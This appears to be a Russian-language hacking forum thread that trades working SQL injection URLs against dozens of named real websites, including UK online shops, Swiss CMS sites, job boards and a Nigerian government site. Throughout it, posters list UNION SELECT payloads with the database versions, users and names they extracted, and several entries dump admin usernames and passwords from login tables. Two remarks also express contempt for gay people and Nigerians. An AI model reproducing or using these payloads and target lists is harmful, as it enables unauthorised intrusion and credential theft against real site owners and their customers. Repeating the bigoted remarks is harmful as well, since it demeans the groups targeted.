SQL Инъекции

http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6--

 

de.varesehotels.it

Code:

http://de.varesehotels.it/territorio/145-beata-vergine-dei-miracoli.php?km=50+union+select

+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database

%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36

,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62+--+

Code:

5.0.51a-24+lenny1:varetels_db@localhost:varetels_db

 

http://www.thaikaspersky.com/2010/newheader/newsview2010.php?id=67+and+1=2+union+all+select+1,2,concat(0x3a,version(),user(),database()),4

Инжект от Unu.

 

lesenschreiben.ch PR-4

Code:

http://www.lesenschreiben.ch/cms/page.php?p=-1+union+select+1,2,3,4,5,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+

Code:

5.0.67-log:[email protected]:lesen-schreiben-schweizch

airbase-bern.ch PR-3

Code:

http://www.airbase-bern.ch/cms/page.php?p=1&img=-1+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+from+adm_user+--+

Code:

5.0.67-log:[email protected]:airbase-bernch

lesen-schreiben-schweiz.ch PR-4

Code:

http://www.lesen-schreiben-schweiz.ch/cms/page.php?p=-18+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database())+--+

Code:

5.0.67-log:[email protected]:lesen-schreiben-schweizch

volets-du-rhone.ch

Code:

http://www.volets-du-rhone.ch/sgcms/cms/page.php?p=-42+union+select+1,2,3,4,5,6,7,8,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29%29,10,11,12+--+

Code:

4.1.11-nt:[email protected]:volets-du-rhone

jpgpeinture.ch

Code:

http://www.jpgpeinture.ch/cms/page.php?p=-2+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+

Code:

5.0.67-log:[email protected]:jpgpeinturech

botennis.ch

Code:

http://www.botennis.ch/sgcms/cms/page.php?p=-20+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+

Code:

5.0.67-log:[email protected]:botennisch1

 

Шопы

Code:

http://www.nutrecare.co.uk/latest_detail.asp?prod_id=1268&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.ukrooflights.co.uk/latest_detail.asp?prod_id=519&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.planetdancedirect.com/latest_detail.asp?prod_id=8208&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.planetdancedirect.co.uk/latest_detail.asp?prod_id=8683&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.hyundai-generators.co.uk/latest_detail.asp?prod_id=478&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.nix-digital.com/latest_detail.asp?prod_id=129&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funthinking.co.uk/latest_detail.asp?prod_id=95&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.startskating.co.uk/latest_detail.asp?prod_id=19&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.australiandesignstore.com/latest_detail.asp?prod_id=345&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.teddyandme.co.uk/latest_detail.asp?prod_id=36&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.yesdoit.co.uk/latest_detail.asp?prod_id=507&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.horseheavensaddlery.co.uk/latest_detail.asp?prod_id=265&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bebebel.co.uk/latest_detail.asp?prod_id=204&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.sharpquips.co.uk/latest_detail.asp?prod_id=8406&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.hamradio4u.co.uk/latest_detail.asp?prod_id=672&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://internettackleshop.co.uk/latest_detail.asp?prod_id=1305&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpriceappliances.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3359&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.stagwatches.co.uk/latest_detail.asp?prod_id=114&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpricefilters.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=497&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.neoartglass.co.uk/latest_detail.asp?prod_id=569&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.spencercollection.com/latest_detail.asp?prod_id=8365&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.theelectricgateshop.co.uk/latest_detail.asp?prod_id=1271&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.teddyandme.co.uk/latest_detail.asp?prod_id=22&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.theboarding-house.co.uk/latest_detail.asp?prod_id=484&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.reds-superstore.co.uk/latest_detail.asp?prod_id=286&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.barnsleycarwarehouse.co.uk/latest_detail.asp?prod_id=8804&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.lasersurveyequipment.co.uk/latest_detail.asp?prod_id=1354&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.banglesnjangles.co.uk/latest_detail.asp?prod_id=6&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.litespot.co.uk/latest_detail.asp?prod_id=3638&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.elements-jewellery.co.uk/latest_detail.asp?prod_id=158&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.cornwallis-images.com/latest_detail.asp?prod_id=340&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funthinking.co.uk/latest_detail.asp?currency=1&prod_id=212&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funkyrascals.co.uk/latest_detail.asp?prod_id=118&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://brfcdirect.co.uk/latest_detail.asp?prod_id=264&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.trustsport.co.uk/latest_detail.asp?prod_id=260&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.moroccandecor.co.uk/latest_detail.asp?prod_id=9078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.photo-bug.co.uk/latest_detail.asp?prod_id=514&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8081&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://bigdogcustom.com/latest_detail.asp?prod_id=132&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.dekapakltd.co.uk/latest_detail.asp?prod_id=73&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.jewellerytraders.co.uk/latest_detail.asp?prod_id=76&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.memoryuniverse.co.uk/latest_detail.asp?prod_id=128&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3357&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=476&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.chairoutlet.co.uk/latest_detail.asp?prod_id=488&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.australiandesignstore.com/latest_detail.asp?prod_id=401&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://thatsthephone.co.uk/latest_detail.asp?currency=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.highlandtackle.co.uk/latest_detail.asp?prod_id=211&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigfellasclothing.com/latest_detail.asp?prod_id=288&offset=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.penandlolly.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=226&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpriceappliances.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpricefilters.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://bigdogcustom.com/latest_detail.asp?prod_id=119&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.southgeorgia.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=116&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*

 

Code:

http://ru-board.com/new/search.php?author=-lynx%27+union+select+1,2,3,concat_ws%28%27.%27,table_schema,table_name,column_name%29,5,6,7,8,9,10+from+information_schema.columns+--+

version 5.0.77
database phpnuke
user phpnuke@localhost

 

Code:

http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,8,9,1,1,0,1,5--

astrakha_board@localhost:astrakha_board:4.1.25

Code:

http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,group_concat%28login,0x3a,password%29,8,8,9,1,1,0,1,5+from+users--

 

http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+--+

5.0.22
crescendo_en
cr@localhost
redhat-linux-gnu

http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x20,password)+from+admin+--+

 

Omega-time:

Code:

http://www.omega-time.ru/watches.phtml?idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Version: 5.0.88
Database: OmegaSQL
User: OmegaSQL@localhost

 

Версия 5.0.67-log
Пользователь [email protected]

Code:

http://06-r2.ru/news.php?id=99999999999+UNION SELECT CONCAT(1,CHAR(44)),2,CONCAT(3,CHAR(44)),4,CONCAT(5,CHAR(44)),CONCAT(6,CHAR(44)),CONCAT(7,CHAR(44))-- 

Версия 4.0.27-max-log
Пользователь [email protected]

Code:

http://www.03reclama.ru/03reclama_new/Catalog/index.php?id_parent=99999999999+UNION SELECT 1,CONCAT(2,CHAR(44)),CONCAT(3,CHAR(44)),CONCAT(4,CHAR(44)),5,6,7-- 

 

Code:

http://jobs.webdesignerwall.com/job.php?id=-448+union+all+select+1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11--

designer_admin2@localhost
designer_jobs
4.1.22-standard

Code:

http://jobs.neurope.eu/job.php?id=-1758+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

neweuro_kostas@localhost
neweuro_corporate
4.1.22-standard

Code:

http://www.adclubct.org/job-bank/job.php?id=-19+union+select+1,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,5,6,7--

tdwestne_adclub@localhost
tdwestne_adclubct
5.0.85-community-log

Code:

http://www.gexecutives.com/job.php?ID=-201+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

sfaddoul@localhost
sfaddoul_gexec
5.0.85-community

 

http://www.nlpplanning.com/vacancy.php?id=-55+UNION+SELECT+1,22,3,4,5,6,7,8,9,10,11,12,13

Database Version: 4.0.30-log
Database name: u10001284
User name: [email protected]

 

Версия - 5
БД - mexaldbsource
Юзер - [email protected]

админка по обычному адресу какая то лажа, а вот в другом месте норм)

 

version: 5.0.86-percona-highperf-b19

 

http://www.aztecadventure.co.uk/content.php?cid=22+UNION+SELECT+1,2,3,2,5,6,7,8,9,10/*

Database Version: 4.1.20
Database name: aztec
User name: aztec_user@localhost

там и без иньекции ошибка

 

www.chrisjordan.com

Code:

http://www.chrisjordan.com/current_set2.php?id=-11'+union+select+1,concat_ws(CHAR(60,98,114,47,62),version(),database(),user()),3,4,5/*

ver: 4.1.22-max-log
db: cjordanwebdata
user: [email protected]

www.reefcheck.org
либо у меня руки не из того места растут, либо там действитеьно нет аксесса к юзерам.
Но на всякий выложу.

Code:

http://www.reefcheck.org/news/news_detail.php?id=252+and+1=2+union+select+concat_ws%280x3a,%20table_name,%20table_schema,column_name%29,2,3+from+information_schema.columns+where+table_name=CHAR%2897,99,99,111,117,110,116%29/*

neoboy.ru

Code:

http://neoboy.ru/goods.php?id=948+and+1=2+union+select+1,2,group_concat%28password%29,4,5,group_concat%28login%29,7,8+from+neoboy_admin-- 

Чтоб эти геи в аду сгорели ....

 

Новогодний привет bluesoleil'у =)

http://www.bluesoleil.com/products/Default.aspx?TID=-7'+union+select+1/*

version: 5.1.34-community
user: bluesoleil@localhost
database: bluesoleil
os: Win32

ТИЦ: 90
PR: 4

 

Code:

http://www.insanely-great.com/news.php?id=-1514+union+select+concat_ws(0x3a,user(),database(),version())

[email protected]:flamini_igm:4.1.21-log

Code:

http://www.ziggymarley.com/news.php?status=sort&id=6'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)+--+

5.0.67-log

Code:

http://www.digitalsynapsis.tv/news.php?id=-32+union+select+1,2,concat_ws(0x3a,username,password,email),4+from+utenti

 

Думал, что в Нигерии только деревянные хижины и дикари-негры полуголые .. хех

http://www.lagosstate.gov.ng/showeventlist.php?index.php?page=event&evday=14&evmon=12&evyear=2009+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+0x257061737325--+

 

www.nirvanaaudiovisual.co.uk - MySQL 5

Code:

http://www.nirvanaaudiovisual.co.uk/product_desc.php?id=383+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,admin_firstname,admin_password%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin--

www.powertel.co.id - MySQL 5

Code:

http://www.powertel.co.id/news.php?idm=11&idy=2008+and+1=2+union+select+1,2,3,concat_ws%280x3a,username,password%29,5,6,7+from+login--

www.sierracorporation.com - MySQL 5

Code:

http://www.sierracorporation.com/news.php?id=99%27+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,username,password%29%29,6,7,8,9,10,11,12,131,14+from+users+--+

www.cpehn.org - MySQL 5

Code:

http://www.cpehn.org/register.php?id=111+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,loginname,password%29%29,3,4+from+users--

www.humanedgetech.com - MySQL 5

Code:

http://www.humanedgetech.com/news.php?id=15649+and+1=2+union+select+1,group_concat%28table_name%29,3,4,5,6,7+from+information_schema.tables+where+table_name+like+CHAR%2837,117,115,101,114,37%29--

www.u2wanderer.org - MySQL 4

Code:

http://www.u2wanderer.org/disco/lyrics.php?id=424+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws%28CHAR%2860,98,114,47,62%29,version%28%29,database%28%29,user%28%29%29,9--

www.insanely-great.com - MySQL 4

Code:

http://www.insanely-great.com/news.php?id=6553+and+1=2+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--